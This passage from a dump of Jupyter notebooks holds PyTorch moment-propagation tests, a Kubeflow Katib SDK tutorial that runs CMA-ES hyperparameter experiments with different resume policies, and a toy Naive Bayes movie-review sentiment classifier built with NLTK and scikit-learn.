* 0, var.diag()).sample((count,))\n for i in range(mu.size(0)):\n with torch.no_grad():\n samples = normal_samples + mu[i, ...]\n out_mu = net.mean(mu[i:i+1, ...], var)\n mc_mu = net(samples).mean(0, keepdim=True)\n print(round((out_mu / mc_mu).abs().mean().item(), 1))\n \n @staticmethod\n def test_conv2d(shallow=True, n=7, sigma=10, count=100000, dtype=torch.float64):\n net = Net(conv=True, shallow=shallow).to(dtype)\n if not isinstance(net[0], torch.nn.Conv2d):\n raise ValueError('The first layer of the network must be a torch.nn.Conv2d')\n print(net)\n mu = sigma * torch.randn(n, net[0].in_channels, 10, 10, dtype=dtype)\n var = sigma**2 * torch.rand(*mu.shape[1:], dtype=dtype)\n normal_samples = torch.distributions.MultivariateNormal(\n mu[0, ...].view(-1) * 0, var.view(-1).diag()).sample((count,)).view(count, *mu[0].size())\n for i in range(mu.size(0)):\n with torch.no_grad():\n samples = normal_samples + mu[i, ...]\n out_mu = net.mean(mu[i:i+1, ...], var)\n mc_mu = net(samples).mean(0, keepdim=True)\n print(round((out_mu / mc_mu).abs().mean().item(), 1))\n \n def loss(self, x, gamma=0.4):\n mu = self.moments(x, torch.tensor(0.3, dtype=x.dtype, device=x.device))\n return self.forward(x).sum() + gamma * mu.sum()\n\n# Net.test_linear(shallow=True)\n# Net.test_linear(shallow=False)\n# Net.test_conv2d(shallow=True)\n# Net.test_conv2d(shallow=False)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
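"code",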
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
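"code",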
"code"
]
] |
e7066a2fba9337eac7472bab0bdfcddc0e188a52 | 42,544 | ipynb | Jupyter Notebook | examples/v1beta1/sdk/cmaes-and-resume-policies.ipynb | VariableDeclared/katib | d3c5388e564c4c198e2355617209b812c0367675 | [
"Apache-2.0"
] | null | null | null | examples/v1beta1/sdk/cmaes-and-resume-policies.ipynb | VariableDeclared/katib | d3c5388e564c4c198e2355617209b812c0367675 | [
"Apache-2.0"
] | null | null | null | examples/v1beta1/sdk/cmaes-and-resume-policies.ipynb | VariableDeclared/katib | d3c5388e564c4c198e2355617209b812c0367675 | [
"Apache-2.0"
] | null | null | null | 42.374502 | 4,187 | 0.526349 | [
[
[
"# HyperParameter tunning using CMA-ES\n\nIn this example you will deploy 3 Katib Experiments with Covariance Matrix Adaptation Evolution Strategy (CMA-ES) using Jupyter Notebook and Katib SDK. These Experiments have various resume policies.\n\nReference documentation:\n- https://www.kubeflow.org/docs/components/katib/experiment/#cmaes\n- https://www.kubeflow.org/docs/components/katib/resume-experiment/\n\nThe notebook shows how to create, get, check status and delete an Experiment.",
"_____no_output_____"
]
],
[
[
"# Install required package (Katib SDK).\n!pip install kubeflow-katib==0.12.0",
"Collecting kubeflow-katib==0.12.0\n Downloading kubeflow_katib-0.12.0-py3-none-any.whl (89 kB)\n\u001b[K |████████████████████████████████| 89 kB 7.5 MB/s eta 0:00:01\n\u001b[?25hRequirement already satisfied: urllib3>=1.15.1 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (1.26.5)\nRequirement already satisfied: certifi>=14.05.14 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (2021.5.30)\nRequirement already satisfied: setuptools>=21.0.0 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (49.6.0.post20210108)\nRequirement already satisfied: six>=1.10 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (1.15.0)\nRequirement already satisfied: kubernetes>=12.0.0 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (12.0.1)\nRequirement already satisfied: requests in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (2.25.1)\nRequirement already satisfied: requests-oauthlib in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (1.3.0)\nRequirement already satisfied: google-auth>=1.0.1 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (1.31.0)\nRequirement already satisfied: python-dateutil>=2.5.3 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (2.8.1)\nRequirement already satisfied: pyyaml>=3.12 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (5.4.1)\nRequirement already satisfied: websocket-client!=0.40.0,!=0.41.*,!=0.42.*,>=0.32.0 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (1.0.1)\nRequirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.8/site-packages (from google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (4.7.2)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.8/site-packages (from google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (0.2.8)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.8/site-packages (from google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (4.2.2)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.8/site-packages (from pyasn1-modules>=0.2.1->google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (0.4.8)\nRequirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.8/site-packages (from requests->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (2.10)\nRequirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.8/site-packages (from requests->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (4.0.0)\nRequirement already satisfied: oauthlib>=3.0.0 in /opt/conda/lib/python3.8/site-packages (from requests-oauthlib->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (3.1.1)\nInstalling collected packages: kubeflow-katib\nSuccessfully installed kubeflow-katib-0.12.0\n"
]
],
[
[
"## Import required packages",
"_____no_output_____"
]
],
[
[
"import copy\n\nfrom kubeflow.katib import KatibClient\nfrom kubernetes.client import V1ObjectMeta\nfrom kubeflow.katib import V1beta1Experiment\nfrom kubeflow.katib import V1beta1AlgorithmSpec\nfrom kubeflow.katib import V1beta1ObjectiveSpec\nfrom kubeflow.katib import V1beta1FeasibleSpace\nfrom kubeflow.katib import V1beta1ExperimentSpec\nfrom kubeflow.katib import V1beta1ObjectiveSpec\nfrom kubeflow.katib import V1beta1ParameterSpec\nfrom kubeflow.katib import V1beta1TrialTemplate\nfrom kubeflow.katib import V1beta1TrialParameterSpec",
"_____no_output_____"
]
],
[
[
"## Define your Experiment\n\nYou have to create your Experiment object before deploying it. This Experiment is similar to [this](https://github.com/kubeflow/katib/blob/master/examples/v1beta1/hp-tuning/cmaes.yaml) example.",
"_____no_output_____"
]
],
[
[
"# Experiment name and namespace.\nnamespace = \"kubeflow-user-example-com\"\nexperiment_name = \"cmaes-example\"\n\nmetadata = V1ObjectMeta(\n name=experiment_name,\n namespace=namespace\n)\n\n# Algorithm specification.\nalgorithm_spec=V1beta1AlgorithmSpec(\n algorithm_name=\"cmaes\"\n)\n\n# Objective specification.\nobjective_spec=V1beta1ObjectiveSpec(\n type=\"maximize\",\n goal= 0.99,\n objective_metric_name=\"Validation-accuracy\",\n additional_metric_names=[\"Train-accuracy\"]\n)\n\n# Experiment search space. In this example we tune learning rate, number of layer and optimizer.\nparameters=[\n V1beta1ParameterSpec(\n name=\"lr\",\n parameter_type=\"double\",\n feasible_space=V1beta1FeasibleSpace(\n min=\"0.01\",\n max=\"0.06\"\n ),\n ),\n V1beta1ParameterSpec(\n name=\"num-layers\",\n parameter_type=\"int\",\n feasible_space=V1beta1FeasibleSpace(\n min=\"2\",\n max=\"5\"\n ),\n ),\n V1beta1ParameterSpec(\n name=\"optimizer\",\n parameter_type=\"categorical\",\n feasible_space=V1beta1FeasibleSpace(\n list=[\"sgd\", \"adam\", \"ftrl\"]\n ),\n ),\n]\n\n\n\n# JSON template specification for the Trial's Worker Kubernetes Job.\ntrial_spec={\n \"apiVersion\": \"batch/v1\",\n \"kind\": \"Job\",\n \"spec\": {\n \"template\": {\n \"metadata\": {\n \"annotations\": {\n \"sidecar.istio.io/inject\": \"false\"\n }\n },\n \"spec\": {\n \"containers\": [\n {\n \"name\": \"training-container\",\n \"image\": \"docker.io/kubeflowkatib/mxnet-mnist:v0.12.0\",\n \"command\": [\n \"python3\",\n \"/opt/mxnet-mnist/mnist.py\",\n \"--batch-size=64\",\n \"--lr=${trialParameters.learningRate}\",\n \"--num-layers=${trialParameters.numberLayers}\",\n \"--optimizer=${trialParameters.optimizer}\"\n ]\n }\n ],\n \"restartPolicy\": \"Never\"\n }\n }\n }\n}\n\n# Configure parameters for the Trial template.\ntrial_template=V1beta1TrialTemplate(\n primary_container_name=\"training-container\",\n trial_parameters=[\n V1beta1TrialParameterSpec(\n name=\"learningRate\",\n description=\"Learning rate for the training model\",\n reference=\"lr\"\n ),\n V1beta1TrialParameterSpec(\n name=\"numberLayers\",\n description=\"Number of training model layers\",\n reference=\"num-layers\"\n ),\n V1beta1TrialParameterSpec(\n name=\"optimizer\",\n description=\"Training model optimizer (sdg, adam or ftrl)\",\n reference=\"optimizer\"\n ),\n ],\n trial_spec=trial_spec\n)\n\n\n# Experiment object.\nexperiment = V1beta1Experiment(\n api_version=\"kubeflow.org/v1beta1\",\n kind=\"Experiment\",\n metadata=metadata,\n spec=V1beta1ExperimentSpec(\n max_trial_count=7,\n parallel_trial_count=3,\n max_failed_trial_count=3,\n algorithm=algorithm_spec,\n objective=objective_spec,\n parameters=parameters,\n trial_template=trial_template,\n )\n)",
"_____no_output_____"
]
],
[
[
"## Define Experiments with resume policy\n\nWe will define another 2 Experiments with ResumePolicy = Never and ResumePolicy = FromVolume.\n\nExperiment with _Never_ resume policy can't be resumed, the Suggestion resources will be deleted.\n\nExperiment with _FromVolume_ resume policy can be resumed, volume is attached to the Suggestion. Suggestion's PVC be created for the Suggestion.",
"_____no_output_____"
]
],
[
[
"experiment_never_resume_name = \"never-resume-cmaes\"\nexperiment_from_volume_resume_name = \"from-volume-resume-cmaes\"\n\n# Create new Experiments from the previous Experiment info.\n# Define Experiment with never resume.\nexperiment_never_resume = copy.deepcopy(experiment)\nexperiment_never_resume.metadata.name = experiment_never_resume_name\nexperiment_never_resume.spec.resume_policy = \"Never\"\nexperiment_never_resume.spec.max_trial_count = 4\n\n# Define Experiment with from volume resume.\nexperiment_from_volume_resume = copy.deepcopy(experiment)\nexperiment_from_volume_resume.metadata.name = experiment_from_volume_resume_name\nexperiment_from_volume_resume.spec.resume_policy = \"FromVolume\"\nexperiment_from_volume_resume.spec.max_trial_count = 4",
"_____no_output_____"
]
],
[
[
"You can print the Experiment's info to verify it before submission.",
"_____no_output_____"
]
],
[
[
"print(experiment.metadata.name)\nprint(experiment.spec.algorithm.algorithm_name)\nprint(\"-----------------\")\nprint(experiment_never_resume.metadata.name)\nprint(experiment_never_resume.spec.resume_policy)\nprint(\"-----------------\")\nprint(experiment_from_volume_resume.metadata.name)\nprint(experiment_from_volume_resume.spec.resume_policy)\n",
"cmaes-example\ncmaes\n-----------------\nnever-resume-cmaes\nNever\n-----------------\nfrom-volume-resume-cmaes\nFromVolume\n"
]
],
[
[
"## Create your Experiment\n\nYou have to create Katib client to use the SDK.",
"_____no_output_____"
]
],
[
[
"# Create client.\nkclient = KatibClient()\n\n# Create your Experiment.\nkclient.create_experiment(experiment,namespace=namespace)",
"_____no_output_____"
]
],
[
[
"Create other Experiments.",
"_____no_output_____"
]
],
[
[
"# Create Experiment with never resume.\nkclient.create_experiment(experiment_never_resume,namespace=namespace)\n# Create Experiment with from volume resume.\nkclient.create_experiment(experiment_from_volume_resume,namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## Get your Experiment\n\nYou can get your Experiment by name and receive required data.",
"_____no_output_____"
]
],
[
[
"exp = kclient.get_experiment(name=experiment_name, namespace=namespace)\nprint(exp)\nprint(\"-----------------\\n\")\n\n# Get the max trial count and latest status.\nprint(exp[\"spec\"][\"maxTrialCount\"])\nprint(exp[\"status\"][\"conditions\"][-1])",
"{'apiVersion': 'kubeflow.org/v1beta1', 'kind': 'Experiment', 'metadata': {'creationTimestamp': '2021-10-05T23:40:19Z', 'finalizers': ['update-prometheus-metrics'], 'generation': 1, 'managedFields': [{'apiVersion': 'kubeflow.org/v1beta1', 'fieldsType': 'FieldsV1', 'fieldsV1': {'f:spec': {'.': {}, 'f:algorithm': {'.': {}, 'f:algorithmName': {}}, 'f:maxFailedTrialCount': {}, 'f:maxTrialCount': {}, 'f:objective': {'.': {}, 'f:additionalMetricNames': {}, 'f:goal': {}, 'f:objectiveMetricName': {}, 'f:type': {}}, 'f:parallelTrialCount': {}, 'f:parameters': {}, 'f:trialTemplate': {'.': {}, 'f:primaryContainerName': {}, 'f:trialParameters': {}, 'f:trialSpec': {'.': {}, 'f:apiVersion': {}, 'f:kind': {}, 'f:spec': {'.': {}, 'f:template': {'.': {}, 'f:metadata': {'.': {}, 'f:annotations': {'.': {}, 'f:sidecar.istio.io/inject': {}}}, 'f:spec': {'.': {}, 'f:containers': {}, 'f:restartPolicy': {}}}}}}}}, 'manager': 'OpenAPI-Generator', 'operation': 'Update', 'time': '2021-10-05T23:40:19Z'}, {'apiVersion': 'kubeflow.org/v1beta1', 'fieldsType': 'FieldsV1', 'fieldsV1': {'f:metadata': {'f:finalizers': {'.': {}, 'v:\"update-prometheus-metrics\"': {}}}, 'f:status': {'.': {}, 'f:conditions': {}, 'f:currentOptimalTrial': {'.': {}, 'f:bestTrialName': {}, 'f:observation': {'.': {}, 'f:metrics': {}}, 'f:parameterAssignments': {}}, 'f:runningTrialList': {}, 'f:startTime': {}, 'f:trials': {}, 'f:trialsRunning': {}}}, 'manager': 'katib-controller', 'operation': 'Update', 'time': '2021-10-05T23:40:54Z'}], 'name': 'cmaes-example', 'namespace': 'kubeflow-user-example-com', 'resourceVersion': '393932086', 'uid': 'ccf6bb73-6768-4e6e-9a23-742d0953ecf1'}, 'spec': {'algorithm': {'algorithmName': 'cmaes'}, 'maxFailedTrialCount': 3, 'maxTrialCount': 7, 'metricsCollectorSpec': {'collector': {'kind': 'StdOut'}}, 'objective': {'additionalMetricNames': ['Train-accuracy'], 'goal': 0.99, 'metricStrategies': [{'name': 'Validation-accuracy', 'value': 'max'}, {'name': 'Train-accuracy', 'value': 'max'}], 'objectiveMetricName': 'Validation-accuracy', 'type': 'maximize'}, 'parallelTrialCount': 3, 'parameters': [{'feasibleSpace': {'max': '0.06', 'min': '0.01'}, 'name': 'lr', 'parameterType': 'double'}, {'feasibleSpace': {'max': '5', 'min': '2'}, 'name': 'num-layers', 'parameterType': 'int'}, {'feasibleSpace': {'list': ['sgd', 'adam', 'ftrl']}, 'name': 'optimizer', 'parameterType': 'categorical'}], 'resumePolicy': 'LongRunning', 'trialTemplate': {'failureCondition': 'status.conditions.#(type==\"Failed\")#|#(status==\"True\")#', 'primaryContainerName': 'training-container', 'successCondition': 'status.conditions.#(type==\"Complete\")#|#(status==\"True\")#', 'trialParameters': [{'description': 'Learning rate for the training model', 'name': 'learningRate', 'reference': 'lr'}, {'description': 'Number of training model layers', 'name': 'numberLayers', 'reference': 'num-layers'}, {'description': 'Training model optimizer (sdg, adam or ftrl)', 'name': 'optimizer', 'reference': 'optimizer'}], 'trialSpec': {'apiVersion': 'batch/v1', 'kind': 'Job', 'spec': {'template': {'metadata': {'annotations': {'sidecar.istio.io/inject': 'false'}}, 'spec': {'containers': [{'command': ['python3', '/opt/mxnet-mnist/mnist.py', '--batch-size=64', '--lr=${trialParameters.learningRate}', '--num-layers=${trialParameters.numberLayers}', '--optimizer=${trialParameters.optimizer}'], 'image': 'docker.io/kubeflowkatib/mxnet-mnist:v0.12.0', 'name': 'training-container'}], 'restartPolicy': 'Never'}}}}}}, 'status': {'conditions': [{'lastTransitionTime': '2021-10-05T23:40:19Z', 
'lastUpdateTime': '2021-10-05T23:40:19Z', 'message': 'Experiment is created', 'reason': 'ExperimentCreated', 'status': 'True', 'type': 'Created'}, {'lastTransitionTime': '2021-10-05T23:40:54Z', 'lastUpdateTime': '2021-10-05T23:40:54Z', 'message': 'Experiment is running', 'reason': 'ExperimentRunning', 'status': 'True', 'type': 'Running'}], 'currentOptimalTrial': {'bestTrialName': '', 'observation': {'metrics': None}, 'parameterAssignments': None}, 'runningTrialList': ['cmaes-example-xn6txwtw', 'cmaes-example-8crn89vg', 'cmaes-example-4q8hmt9r'], 'startTime': '2021-10-05T23:40:19Z', 'trials': 3, 'trialsRunning': 3}}\n-----------------\n\n7\n{'lastTransitionTime': '2021-10-05T23:40:54Z', 'lastUpdateTime': '2021-10-05T23:40:54Z', 'message': 'Experiment is running', 'reason': 'ExperimentRunning', 'status': 'True', 'type': 'Running'}\n"
]
],
[
[
"## Get all Experiments\n\nYou can get list of the current Experiments.",
"_____no_output_____"
]
],
[
[
"# Get names from the running Experiments.\nexp_list = kclient.get_experiment(namespace=namespace)\n\nfor exp in exp_list[\"items\"]:\n print(exp[\"metadata\"][\"name\"])",
"cmaes-example\nfrom-volume-resume-cmaes\nnever-resume-cmaes\n"
]
],
[
[
"## Get the current Experiment status\n\nYou can check the current Experiment status.",
"_____no_output_____"
]
],
[
[
"kclient.get_experiment_status(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"You can check if your Experiment is succeeded.",
"_____no_output_____"
]
],
[
[
"kclient.is_experiment_succeeded(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## List of the current Trials\n\nYou can get list of the current trials with the latest status.",
"_____no_output_____"
]
],
[
[
"# Trial list.\nkclient.list_trials(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## Get the optimal HyperParameters\n\nYou can get the current optimal Trial from your Experiment. For the each metric you can see the max, min and latest value.",
"_____no_output_____"
]
],
[
[
"# Optimal HPs.\nkclient.get_optimal_hyperparameters(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## Status for the Suggestion objects\n\nYou can check the Suggestion object status for more information about resume status.\n\nFor Experiment with FromVolume you should be able to check created PVC.",
"_____no_output_____"
]
],
[
[
"# Get the current Suggestion status for the never resume Experiment.\nsuggestion = kclient.get_suggestion(name=experiment_never_resume_name, namespace=namespace)\n\nprint(suggestion[\"status\"][\"conditions\"][-1][\"message\"])\nprint(\"-----------------\")\n\n# Get the current Suggestion status for the from volume Experiment.\nsuggestion = kclient.get_suggestion(name=experiment_from_volume_resume_name, namespace=namespace)\n\nprint(suggestion[\"status\"][\"conditions\"][-1][\"message\"])",
"Suggestion is succeeded, can't be restarted\n-----------------\nSuggestion is succeeded, suggestion volume is not deleted, can be restarted\n"
]
],
[
[
"## Delete your Experiments\n\nYou can delete your Experiments.",
"_____no_output_____"
]
],
[
[
"kclient.delete_experiment(name=experiment_name, namespace=namespace)\nkclient.delete_experiment(name=experiment_never_resume_name, namespace=namespace)\nkclient.delete_experiment(name=experiment_from_volume_resume_name, namespace=namespace)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7066ab803d2263969f2857e8232399b558a8704 | 12,058 | ipynb | Jupyter Notebook | MachineLearning/projects/MovieReviewPrediction/Untitled2.ipynb | pulkit10251/cbData-Science-Master | fc3780b41c463530760ca7b7872158c5f8e38332 | [
"MIT"
] | null | null | null | MachineLearning/projects/MovieReviewPrediction/Untitled2.ipynb | pulkit10251/cbData-Science-Master | fc3780b41c463530760ca7b7872158c5f8e38332 | [
"MIT"
] | null | null | null | MachineLearning/projects/MovieReviewPrediction/Untitled2.ipynb | pulkit10251/cbData-Science-Master | fc3780b41c463530760ca7b7872158c5f8e38332 | [
"MIT"
] | null | null | null | 26.618102 | 209 | 0.407779 | [
[
[
"\nx = [\"This was awesome an awesome movie\",\n \"Great movie! I liked it a lot\",\n \"Happy Ending! awesome acting by the hero\",\n \"loved it! truly great\",\n \"bad not upto the mark\",\n \"could have been better\",\n \"Surely a Disappointing movie\",\n \"Totally a disgrace, fucked up movie\",\n \"the movie was not good\"]\n\ny = [1,1,1,1,0,0,0,0,0] # 1 - Positive, 0 - Negative Class",
"_____no_output_____"
],
[
"x_test = [\"I was happy & happy and I loved the acting in the movie\",\n \"The movie I saw was bad\",\n \"totally fucked up movie\",\n \"the movie i saw was not bad\"]",
"_____no_output_____"
],
[
"from nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\n\n\ntokenizer=RegexpTokenizer(r'\\w+')\nps=PorterStemmer()\nen_stopwords=set(stopwords.words('English'))\n\n\n\ndef get_cleanedreview(review):\n review=review.lower()\n review=review.replace(\"<br /><br />\",\" \")\n tokens=tokenizer.tokenize(review)\n new_tokens=[token for token in tokens if token not in en_stopwords]\n if \"not\" in tokens:\n new_tokens.append(\"not\")\n stemmed_token=[ps.stem(token) for token in new_tokens]\n \n cleaned_review=' '.join(stemmed_token)\n return cleaned_review",
"_____no_output_____"
],
[
"xcleaned=[get_cleanedreview(sen) for sen in x]\nxtestcleaned=[get_cleanedreview(sen) for sen in x_test]\nprint(xcleaned)",
"['awesom awesom movi', 'great movi like lot', 'happi end awesom act hero', 'love truli great', 'bad upto mark not', 'could better', 'sure disappoint movi', 'total disgrac fuck movi', 'movi good not']\n"
],
[
"from sklearn.feature_extraction.text import CountVectorizer",
"_____no_output_____"
],
[
"cv=CountVectorizer(ngram_range=(1,2))",
"_____no_output_____"
],
[
"xtrain=cv.fit_transform(xcleaned,y).toarray()",
"_____no_output_____"
],
[
"xpred=cv.transform(xtestcleaned).toarray()",
"_____no_output_____"
],
[
"print(xtrain)",
"[[0 0 2 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 1 1 1 0 0 0 0 1 0 1\n 0 0 0 0 0 0 0 0 0]\n [1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 1 0 0 0 0 0\n 0 0 0 0 0 1 1 0 0]\n [0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0\n 1 0 0 0 0 0 0 1 1]\n [0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 1 1 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 1 1 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0\n 1 0 0 0 0 0 0 0 0]]\n"
],
[
"print(xpred)",
"[[1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 1 0 0 0 1 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 1 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 1 0 0 0 0 0 0 0 0]]\n"
],
[
"from sklearn.naive_bayes import MultinomialNB",
"_____no_output_____"
],
[
"mnb=MultinomialNB()",
"_____no_output_____"
],
[
"mnb.fit(xtrain,y)",
"_____no_output_____"
],
[
"mnb.predict(xpred)",
"_____no_output_____"
],
[
"from sklearn.feature_extraction.text import TfidfVectorizer",
"_____no_output_____"
],
[
"tfidf=TfidfVectorizer(ngram_range=(1,2))",
"_____no_output_____"
],
[
"xtrain1=tfidf.fit_transform(xcleaned,y).toarray()",
"_____no_output_____"
],
[
"xtest1=tfidf.transform(xtestcleaned).toarray()\nprint(xtest1)",
"[[0.39730042 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.79460084\n 0. 0. 0. 0. 0. 0.39730042\n 0. 0. 0. 0.23003102 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. ]\n [0. 0. 0. 0. 0. 0.\n 0.86541213 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0.50106071 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. ]\n [0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.54756731\n 0.54756731 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0.31703331 0. 0.\n 0. 0. 0. 0.54756731 0. 0.\n 0. 0. 0. ]\n [0. 0. 0. 0. 0. 0.\n 0.69866894 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0.4045189 0. 0.\n 0.59010691 0. 0. 0. 0. 0.\n 0. 0. 0. ]]\n"
],
[
"tfidf.vocabulary_",
"_____no_output_____"
],
[
"mnb.fit(xtrain1,y)",
"_____no_output_____"
],
[
"mnb.predict(xtest1)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706732e5c172fbef03a295272aba4fea13701a1 | 2,420 | ipynb | Jupyter Notebook | notebooks/nl-be/rpi_switch.ipynb | RaspberryJamBe/IPythonNotebooks | f827fa4c5e85a4c629269954a704000201435e71 | [
"CC0-1.0"
] | null | null | null | notebooks/nl-be/rpi_switch.ipynb | RaspberryJamBe/IPythonNotebooks | f827fa4c5e85a4c629269954a704000201435e71 | [
"CC0-1.0"
] | null | null | null | notebooks/nl-be/rpi_switch.ipynb | RaspberryJamBe/IPythonNotebooks | f827fa4c5e85a4c629269954a704000201435e71 | [
"CC0-1.0"
] | null | null | null | 22 | 113 | 0.462397 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e70674cc4af4f2208f41d53738a9ad785805f44a | 5,541 | ipynb | Jupyter Notebook | Recipes/CGC/files_listAll.ipynb | sbg/okAPI | 4dbf9e917e2a53241fc2a58ddb51ccc9a990b348 | [
"CC-BY-4.0"
] | 23 | 2016-04-03T13:44:35.000Z | 2020-11-19T13:18:33.000Z | Recipes/CGC/files_listAll.ipynb | sbg/okAPI | 4dbf9e917e2a53241fc2a58ddb51ccc9a990b348 | [
"CC-BY-4.0"
] | 8 | 2016-07-06T21:42:35.000Z | 2022-03-05T01:06:32.000Z | Recipes/CGC/files_listAll.ipynb | sbg/okAPI | 4dbf9e917e2a53241fc2a58ddb51ccc9a990b348 | [
"CC-BY-4.0"
] | 17 | 2016-03-23T12:36:24.000Z | 2021-10-30T17:35:21.000Z | 30.955307 | 243 | 0.587259 | [
[
[
